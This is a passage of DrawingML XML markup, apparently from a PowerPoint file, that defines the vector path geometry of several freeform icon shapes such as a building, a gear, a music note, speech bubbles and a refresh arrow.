                  <a:gd name="T93" fmla="*/ 57 h 130"/>
                  <a:gd name="T94" fmla="*/ 74 w 131"/>
                  <a:gd name="T95" fmla="*/ 57 h 130"/>
                  <a:gd name="T96" fmla="*/ 74 w 131"/>
                  <a:gd name="T97" fmla="*/ 1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1" h="130">
                    <a:moveTo>
                      <a:pt x="0" y="130"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="66" y="13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30"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="41" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="58" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="16"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="41" y="49"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="58" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="49"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="41" y="81"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="58" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="81"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="16"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9" y="49"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="49"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9" y="81"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="81"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="74" y="41"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="131" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="41"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="74" y="130"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="90" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="1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29" name="Freeform 164">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59E85921-453A-4067-AFE4-316A9317A4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88930" y="2636148"/>
                <a:ext cx="146800" cy="154628"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 43 w 46"/>
                  <a:gd name="T1" fmla="*/ 29 h 48"/>
                  <a:gd name="T2" fmla="*/ 46 w 46"/>
                  <a:gd name="T3" fmla="*/ 16 h 48"/>
                  <a:gd name="T4" fmla="*/ 41 w 46"/>
                  <a:gd name="T5" fmla="*/ 8 h 48"/>
                  <a:gd name="T6" fmla="*/ 37 w 46"/>
                  <a:gd name="T7" fmla="*/ 9 h 48"/>
                  <a:gd name="T8" fmla="*/ 28 w 46"/>
                  <a:gd name="T9" fmla="*/ 0 h 48"/>
                  <a:gd name="T10" fmla="*/ 18 w 46"/>
                  <a:gd name="T11" fmla="*/ 0 h 48"/>
                  <a:gd name="T12" fmla="*/ 17 w 46"/>
                  <a:gd name="T13" fmla="*/ 4 h 48"/>
                  <a:gd name="T14" fmla="*/ 4 w 46"/>
                  <a:gd name="T15" fmla="*/ 8 h 48"/>
                  <a:gd name="T16" fmla="*/ 0 w 46"/>
                  <a:gd name="T17" fmla="*/ 16 h 48"/>
                  <a:gd name="T18" fmla="*/ 3 w 46"/>
                  <a:gd name="T19" fmla="*/ 19 h 48"/>
                  <a:gd name="T20" fmla="*/ 0 w 46"/>
                  <a:gd name="T21" fmla="*/ 32 h 48"/>
                  <a:gd name="T22" fmla="*/ 4 w 46"/>
                  <a:gd name="T23" fmla="*/ 40 h 48"/>
                  <a:gd name="T24" fmla="*/ 9 w 46"/>
                  <a:gd name="T25" fmla="*/ 39 h 48"/>
                  <a:gd name="T26" fmla="*/ 18 w 46"/>
                  <a:gd name="T27" fmla="*/ 48 h 48"/>
                  <a:gd name="T28" fmla="*/ 28 w 46"/>
                  <a:gd name="T29" fmla="*/ 48 h 48"/>
                  <a:gd name="T30" fmla="*/ 29 w 46"/>
                  <a:gd name="T31" fmla="*/ 44 h 48"/>
                  <a:gd name="T32" fmla="*/ 41 w 46"/>
                  <a:gd name="T33" fmla="*/ 40 h 48"/>
                  <a:gd name="T34" fmla="*/ 46 w 46"/>
                  <a:gd name="T35" fmla="*/ 32 h 48"/>
                  <a:gd name="T36" fmla="*/ 43 w 46"/>
                  <a:gd name="T37" fmla="*/ 29 h 48"/>
                  <a:gd name="T38" fmla="*/ 23 w 46"/>
                  <a:gd name="T39" fmla="*/ 34 h 48"/>
                  <a:gd name="T40" fmla="*/ 13 w 46"/>
                  <a:gd name="T41" fmla="*/ 24 h 48"/>
                  <a:gd name="T42" fmla="*/ 23 w 46"/>
                  <a:gd name="T43" fmla="*/ 14 h 48"/>
                  <a:gd name="T44" fmla="*/ 33 w 46"/>
                  <a:gd name="T45" fmla="*/ 24 h 48"/>
                  <a:gd name="T46" fmla="*/ 23 w 46"/>
                  <a:gd name="T47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" h="48">
                    <a:moveTo>
                      <a:pt x="43" y="29"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="24"/>
                      <a:pt x="42" y="19"/>
                      <a:pt x="46" y="1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0" y="9"/>
                      <a:pt x="39" y="9"/>
                      <a:pt x="37" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="9"/>
                      <a:pt x="28" y="5"/>
                      <a:pt x="28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3"/>
                      <a:pt x="17" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="9"/>
                      <a:pt x="9" y="10"/>
                      <a:pt x="4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7"/>
                      <a:pt x="2" y="18"/>
                      <a:pt x="3" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="24"/>
                      <a:pt x="4" y="29"/>
                      <a:pt x="0" y="32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6" y="39"/>
                      <a:pt x="7" y="39"/>
                      <a:pt x="9" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="39"/>
                      <a:pt x="18" y="43"/>
                      <a:pt x="18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7"/>
                      <a:pt x="28" y="45"/>
                      <a:pt x="29" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="39"/>
                      <a:pt x="37" y="38"/>
                      <a:pt x="41" y="40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5" y="31"/>
                      <a:pt x="44" y="30"/>
                      <a:pt x="43" y="29"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="23" y="34"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="34"/>
                      <a:pt x="13" y="29"/>
                      <a:pt x="13" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="19"/>
                      <a:pt x="18" y="14"/>
                      <a:pt x="23" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="14"/>
                      <a:pt x="33" y="19"/>
                      <a:pt x="33" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="29"/>
                      <a:pt x="28" y="34"/>
                      <a:pt x="2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0" name="Freeform 166">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA4B8780-27C1-43B6-9A83-EBF1DDDD26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71843" y="3567836"/>
                <a:ext cx="107654" cy="207477"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 23 w 34"/>
                  <a:gd name="T1" fmla="*/ 64 h 65"/>
                  <a:gd name="T2" fmla="*/ 23 w 34"/>
                  <a:gd name="T3" fmla="*/ 64 h 65"/>
                  <a:gd name="T4" fmla="*/ 33 w 34"/>
                  <a:gd name="T5" fmla="*/ 50 h 65"/>
                  <a:gd name="T6" fmla="*/ 30 w 34"/>
                  <a:gd name="T7" fmla="*/ 34 h 65"/>
                  <a:gd name="T8" fmla="*/ 15 w 34"/>
                  <a:gd name="T9" fmla="*/ 24 h 65"/>
                  <a:gd name="T10" fmla="*/ 15 w 34"/>
                  <a:gd name="T11" fmla="*/ 24 h 65"/>
                  <a:gd name="T12" fmla="*/ 14 w 34"/>
                  <a:gd name="T13" fmla="*/ 25 h 65"/>
                  <a:gd name="T14" fmla="*/ 15 w 34"/>
                  <a:gd name="T15" fmla="*/ 30 h 65"/>
                  <a:gd name="T16" fmla="*/ 16 w 34"/>
                  <a:gd name="T17" fmla="*/ 30 h 65"/>
                  <a:gd name="T18" fmla="*/ 17 w 34"/>
                  <a:gd name="T19" fmla="*/ 30 h 65"/>
                  <a:gd name="T20" fmla="*/ 24 w 34"/>
                  <a:gd name="T21" fmla="*/ 35 h 65"/>
                  <a:gd name="T22" fmla="*/ 27 w 34"/>
                  <a:gd name="T23" fmla="*/ 51 h 65"/>
                  <a:gd name="T24" fmla="*/ 22 w 34"/>
                  <a:gd name="T25" fmla="*/ 59 h 65"/>
                  <a:gd name="T26" fmla="*/ 22 w 34"/>
                  <a:gd name="T27" fmla="*/ 59 h 65"/>
                  <a:gd name="T28" fmla="*/ 14 w 34"/>
                  <a:gd name="T29" fmla="*/ 53 h 65"/>
                  <a:gd name="T30" fmla="*/ 13 w 34"/>
                  <a:gd name="T31" fmla="*/ 46 h 65"/>
                  <a:gd name="T32" fmla="*/ 6 w 34"/>
                  <a:gd name="T33" fmla="*/ 44 h 65"/>
                  <a:gd name="T34" fmla="*/ 8 w 34"/>
                  <a:gd name="T35" fmla="*/ 54 h 65"/>
                  <a:gd name="T36" fmla="*/ 23 w 34"/>
                  <a:gd name="T37" fmla="*/ 64 h 65"/>
                  <a:gd name="T38" fmla="*/ 19 w 34"/>
                  <a:gd name="T39" fmla="*/ 42 h 65"/>
                  <a:gd name="T40" fmla="*/ 20 w 34"/>
                  <a:gd name="T41" fmla="*/ 41 h 65"/>
                  <a:gd name="T42" fmla="*/ 19 w 34"/>
                  <a:gd name="T43" fmla="*/ 35 h 65"/>
                  <a:gd name="T44" fmla="*/ 18 w 34"/>
                  <a:gd name="T45" fmla="*/ 36 h 65"/>
                  <a:gd name="T46" fmla="*/ 17 w 34"/>
                  <a:gd name="T47" fmla="*/ 36 h 65"/>
                  <a:gd name="T48" fmla="*/ 10 w 34"/>
                  <a:gd name="T49" fmla="*/ 31 h 65"/>
                  <a:gd name="T50" fmla="*/ 7 w 34"/>
                  <a:gd name="T51" fmla="*/ 15 h 65"/>
                  <a:gd name="T52" fmla="*/ 12 w 34"/>
                  <a:gd name="T53" fmla="*/ 7 h 65"/>
                  <a:gd name="T54" fmla="*/ 12 w 34"/>
                  <a:gd name="T55" fmla="*/ 7 h 65"/>
                  <a:gd name="T56" fmla="*/ 20 w 34"/>
                  <a:gd name="T57" fmla="*/ 13 h 65"/>
                  <a:gd name="T58" fmla="*/ 21 w 34"/>
                  <a:gd name="T59" fmla="*/ 20 h 65"/>
                  <a:gd name="T60" fmla="*/ 28 w 34"/>
                  <a:gd name="T61" fmla="*/ 22 h 65"/>
                  <a:gd name="T62" fmla="*/ 26 w 34"/>
                  <a:gd name="T63" fmla="*/ 12 h 65"/>
                  <a:gd name="T64" fmla="*/ 11 w 34"/>
                  <a:gd name="T65" fmla="*/ 2 h 65"/>
                  <a:gd name="T66" fmla="*/ 11 w 34"/>
                  <a:gd name="T67" fmla="*/ 2 h 65"/>
                  <a:gd name="T68" fmla="*/ 1 w 34"/>
                  <a:gd name="T69" fmla="*/ 16 h 65"/>
                  <a:gd name="T70" fmla="*/ 4 w 34"/>
                  <a:gd name="T71" fmla="*/ 32 h 65"/>
                  <a:gd name="T72" fmla="*/ 19 w 34"/>
                  <a:gd name="T73" fmla="*/ 4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" h="65">
                    <a:moveTo>
                      <a:pt x="23" y="64"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="64"/>
                      <a:pt x="23" y="64"/>
                      <a:pt x="23" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="63"/>
                      <a:pt x="34" y="56"/>
                      <a:pt x="33" y="50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9" y="27"/>
                      <a:pt x="22" y="23"/>
                      <a:pt x="15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4" y="25"/>
                      <a:pt x="14" y="25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5" y="30"/>
                      <a:pt x="16" y="30"/>
                      <a:pt x="16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0" y="29"/>
                      <a:pt x="24" y="32"/>
                      <a:pt x="24" y="35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28" y="54"/>
                      <a:pt x="26" y="58"/>
                      <a:pt x="22" y="59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18" y="59"/>
                      <a:pt x="15" y="57"/>
                      <a:pt x="14" y="53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0" y="46"/>
                      <a:pt x="8" y="45"/>
                      <a:pt x="6" y="4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0" y="61"/>
                      <a:pt x="16" y="65"/>
                      <a:pt x="23" y="64"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="19" y="42"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="41"/>
                      <a:pt x="20" y="41"/>
                      <a:pt x="20" y="41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6"/>
                      <a:pt x="18" y="36"/>
                      <a:pt x="18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4" y="37"/>
                      <a:pt x="10" y="34"/>
                      <a:pt x="10" y="31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2"/>
                      <a:pt x="8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6" y="7"/>
                      <a:pt x="19" y="9"/>
                      <a:pt x="20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4" y="20"/>
                      <a:pt x="26" y="21"/>
                      <a:pt x="28" y="2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5"/>
                      <a:pt x="18" y="0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4" y="3"/>
                      <a:pt x="0" y="10"/>
                      <a:pt x="1" y="16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8"/>
                      <a:pt x="12" y="43"/>
                      <a:pt x="19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1" name="Freeform 167">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46B85CF9-609C-4997-8EE0-5BE252E88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8179" y="1575276"/>
                <a:ext cx="293599" cy="293599"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 92"/>
                  <a:gd name="T1" fmla="*/ 17 h 92"/>
                  <a:gd name="T2" fmla="*/ 92 w 92"/>
                  <a:gd name="T3" fmla="*/ 0 h 92"/>
                  <a:gd name="T4" fmla="*/ 92 w 92"/>
                  <a:gd name="T5" fmla="*/ 6 h 92"/>
                  <a:gd name="T6" fmla="*/ 92 w 92"/>
                  <a:gd name="T7" fmla="*/ 17 h 92"/>
                  <a:gd name="T8" fmla="*/ 92 w 92"/>
                  <a:gd name="T9" fmla="*/ 66 h 92"/>
                  <a:gd name="T10" fmla="*/ 72 w 92"/>
                  <a:gd name="T11" fmla="*/ 80 h 92"/>
                  <a:gd name="T12" fmla="*/ 52 w 92"/>
                  <a:gd name="T13" fmla="*/ 66 h 92"/>
                  <a:gd name="T14" fmla="*/ 72 w 92"/>
                  <a:gd name="T15" fmla="*/ 52 h 92"/>
                  <a:gd name="T16" fmla="*/ 81 w 92"/>
                  <a:gd name="T17" fmla="*/ 53 h 92"/>
                  <a:gd name="T18" fmla="*/ 81 w 92"/>
                  <a:gd name="T19" fmla="*/ 23 h 92"/>
                  <a:gd name="T20" fmla="*/ 41 w 92"/>
                  <a:gd name="T21" fmla="*/ 34 h 92"/>
                  <a:gd name="T22" fmla="*/ 41 w 92"/>
                  <a:gd name="T23" fmla="*/ 78 h 92"/>
                  <a:gd name="T24" fmla="*/ 21 w 92"/>
                  <a:gd name="T25" fmla="*/ 92 h 92"/>
                  <a:gd name="T26" fmla="*/ 0 w 92"/>
                  <a:gd name="T27" fmla="*/ 78 h 92"/>
                  <a:gd name="T28" fmla="*/ 21 w 92"/>
                  <a:gd name="T29" fmla="*/ 63 h 92"/>
                  <a:gd name="T30" fmla="*/ 29 w 92"/>
                  <a:gd name="T31" fmla="*/ 65 h 92"/>
                  <a:gd name="T32" fmla="*/ 29 w 92"/>
                  <a:gd name="T33" fmla="*/ 34 h 92"/>
                  <a:gd name="T34" fmla="*/ 29 w 92"/>
                  <a:gd name="T35" fmla="*/ 1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2" h="92">
                    <a:moveTo>
                      <a:pt x="29" y="17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17"/>
                      <a:pt x="92" y="17"/>
                      <a:pt x="92" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="66"/>
                      <a:pt x="92" y="66"/>
                      <a:pt x="92" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="74"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="72" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="80"/>
                      <a:pt x="52" y="74"/>
                      <a:pt x="52" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="58"/>
                      <a:pt x="61" y="52"/>
                      <a:pt x="72" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="52"/>
                      <a:pt x="78" y="52"/>
                      <a:pt x="81" y="53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41" y="34"/>
                      <a:pt x="41" y="34"/>
                      <a:pt x="41" y="34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1" y="86"/>
                      <a:pt x="32" y="92"/>
                      <a:pt x="21" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="92"/>
                      <a:pt x="0" y="86"/>
                      <a:pt x="0" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="70"/>
                      <a:pt x="9" y="63"/>
                      <a:pt x="21" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="63"/>
                      <a:pt x="27" y="64"/>
                      <a:pt x="29" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="34"/>
                      <a:pt x="29" y="34"/>
                      <a:pt x="29" y="34"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="29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2" name="Freeform 168">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3253999-CA63-40FE-82B3-E3B5E3762F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63114" y="4108059"/>
                <a:ext cx="227050" cy="201604"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 71"/>
                  <a:gd name="T1" fmla="*/ 0 h 63"/>
                  <a:gd name="T2" fmla="*/ 30 w 71"/>
                  <a:gd name="T3" fmla="*/ 0 h 63"/>
                  <a:gd name="T4" fmla="*/ 59 w 71"/>
                  <a:gd name="T5" fmla="*/ 23 h 63"/>
                  <a:gd name="T6" fmla="*/ 30 w 71"/>
                  <a:gd name="T7" fmla="*/ 47 h 63"/>
                  <a:gd name="T8" fmla="*/ 25 w 71"/>
                  <a:gd name="T9" fmla="*/ 47 h 63"/>
                  <a:gd name="T10" fmla="*/ 4 w 71"/>
                  <a:gd name="T11" fmla="*/ 55 h 63"/>
                  <a:gd name="T12" fmla="*/ 4 w 71"/>
                  <a:gd name="T13" fmla="*/ 53 h 63"/>
                  <a:gd name="T14" fmla="*/ 11 w 71"/>
                  <a:gd name="T15" fmla="*/ 44 h 63"/>
                  <a:gd name="T16" fmla="*/ 11 w 71"/>
                  <a:gd name="T17" fmla="*/ 42 h 63"/>
                  <a:gd name="T18" fmla="*/ 0 w 71"/>
                  <a:gd name="T19" fmla="*/ 23 h 63"/>
                  <a:gd name="T20" fmla="*/ 30 w 71"/>
                  <a:gd name="T21" fmla="*/ 0 h 63"/>
                  <a:gd name="T22" fmla="*/ 62 w 71"/>
                  <a:gd name="T23" fmla="*/ 53 h 63"/>
                  <a:gd name="T24" fmla="*/ 67 w 71"/>
                  <a:gd name="T25" fmla="*/ 61 h 63"/>
                  <a:gd name="T26" fmla="*/ 67 w 71"/>
                  <a:gd name="T27" fmla="*/ 63 h 63"/>
                  <a:gd name="T28" fmla="*/ 50 w 71"/>
                  <a:gd name="T29" fmla="*/ 56 h 63"/>
                  <a:gd name="T30" fmla="*/ 46 w 71"/>
                  <a:gd name="T31" fmla="*/ 56 h 63"/>
                  <a:gd name="T32" fmla="*/ 30 w 71"/>
                  <a:gd name="T33" fmla="*/ 52 h 63"/>
                  <a:gd name="T34" fmla="*/ 54 w 71"/>
                  <a:gd name="T35" fmla="*/ 44 h 63"/>
                  <a:gd name="T36" fmla="*/ 61 w 71"/>
                  <a:gd name="T37" fmla="*/ 35 h 63"/>
                  <a:gd name="T38" fmla="*/ 64 w 71"/>
                  <a:gd name="T39" fmla="*/ 23 h 63"/>
                  <a:gd name="T40" fmla="*/ 64 w 71"/>
                  <a:gd name="T41" fmla="*/ 22 h 63"/>
                  <a:gd name="T42" fmla="*/ 71 w 71"/>
                  <a:gd name="T43" fmla="*/ 36 h 63"/>
                  <a:gd name="T44" fmla="*/ 62 w 71"/>
                  <a:gd name="T45" fmla="*/ 52 h 63"/>
                  <a:gd name="T46" fmla="*/ 62 w 71"/>
                  <a:gd name="T47" fmla="*/ 5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1" h="63">
                    <a:moveTo>
                      <a:pt x="3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46" y="0"/>
                      <a:pt x="59" y="10"/>
                      <a:pt x="59" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="37"/>
                      <a:pt x="46" y="47"/>
                      <a:pt x="30" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="47"/>
                      <a:pt x="27" y="47"/>
                      <a:pt x="25" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="53"/>
                      <a:pt x="11" y="55"/>
                      <a:pt x="4" y="55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8" y="51"/>
                      <a:pt x="11" y="48"/>
                      <a:pt x="11" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="43"/>
                      <a:pt x="11" y="43"/>
                      <a:pt x="11" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="38"/>
                      <a:pt x="0" y="31"/>
                      <a:pt x="0" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="10"/>
                      <a:pt x="13" y="0"/>
                      <a:pt x="30" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="62" y="53"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="57"/>
                      <a:pt x="64" y="60"/>
                      <a:pt x="67" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="63"/>
                      <a:pt x="67" y="63"/>
                      <a:pt x="67" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="62"/>
                      <a:pt x="55" y="61"/>
                      <a:pt x="50" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="56"/>
                      <a:pt x="47" y="56"/>
                      <a:pt x="46" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="56"/>
                      <a:pt x="34" y="55"/>
                      <a:pt x="30" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="52"/>
                      <a:pt x="47" y="49"/>
                      <a:pt x="54" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="41"/>
                      <a:pt x="59" y="38"/>
                      <a:pt x="61" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="31"/>
                      <a:pt x="64" y="27"/>
                      <a:pt x="64" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="23"/>
                      <a:pt x="64" y="22"/>
                      <a:pt x="64" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="25"/>
                      <a:pt x="71" y="30"/>
                      <a:pt x="71" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="42"/>
                      <a:pt x="67" y="48"/>
                      <a:pt x="62" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="52"/>
                      <a:pt x="62" y="53"/>
                      <a:pt x="62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3" name="Freeform 169">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C935F6D2-DB72-4869-AFB0-5615C7FEB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7103" y="3679405"/>
                <a:ext cx="207477" cy="207477"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 65 w 65"/>
                  <a:gd name="T1" fmla="*/ 24 h 65"/>
                  <a:gd name="T2" fmla="*/ 41 w 65"/>
                  <a:gd name="T3" fmla="*/ 24 h 65"/>
                  <a:gd name="T4" fmla="*/ 50 w 65"/>
                  <a:gd name="T5" fmla="*/ 15 h 65"/>
                  <a:gd name="T6" fmla="*/ 33 w 65"/>
                  <a:gd name="T7" fmla="*/ 8 h 65"/>
                  <a:gd name="T8" fmla="*/ 16 w 65"/>
                  <a:gd name="T9" fmla="*/ 15 h 65"/>
                  <a:gd name="T10" fmla="*/ 9 w 65"/>
                  <a:gd name="T11" fmla="*/ 32 h 65"/>
                  <a:gd name="T12" fmla="*/ 16 w 65"/>
                  <a:gd name="T13" fmla="*/ 49 h 65"/>
                  <a:gd name="T14" fmla="*/ 33 w 65"/>
                  <a:gd name="T15" fmla="*/ 56 h 65"/>
                  <a:gd name="T16" fmla="*/ 50 w 65"/>
                  <a:gd name="T17" fmla="*/ 49 h 65"/>
                  <a:gd name="T18" fmla="*/ 51 w 65"/>
                  <a:gd name="T19" fmla="*/ 48 h 65"/>
                  <a:gd name="T20" fmla="*/ 57 w 65"/>
                  <a:gd name="T21" fmla="*/ 54 h 65"/>
                  <a:gd name="T22" fmla="*/ 33 w 65"/>
                  <a:gd name="T23" fmla="*/ 65 h 65"/>
                  <a:gd name="T24" fmla="*/ 0 w 65"/>
                  <a:gd name="T25" fmla="*/ 32 h 65"/>
                  <a:gd name="T26" fmla="*/ 33 w 65"/>
                  <a:gd name="T27" fmla="*/ 0 h 65"/>
                  <a:gd name="T28" fmla="*/ 56 w 65"/>
                  <a:gd name="T29" fmla="*/ 9 h 65"/>
                  <a:gd name="T30" fmla="*/ 65 w 65"/>
                  <a:gd name="T31" fmla="*/ 0 h 65"/>
                  <a:gd name="T32" fmla="*/ 65 w 65"/>
                  <a:gd name="T33" fmla="*/ 2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" h="65">
                    <a:moveTo>
                      <a:pt x="65" y="24"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="24"/>
                      <a:pt x="41" y="24"/>
                      <a:pt x="41" y="24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5" y="10"/>
                      <a:pt x="39" y="8"/>
                      <a:pt x="33" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="8"/>
                      <a:pt x="20" y="10"/>
                      <a:pt x="16" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="20"/>
                      <a:pt x="9" y="26"/>
                      <a:pt x="9" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="39"/>
                      <a:pt x="11" y="45"/>
                      <a:pt x="16" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
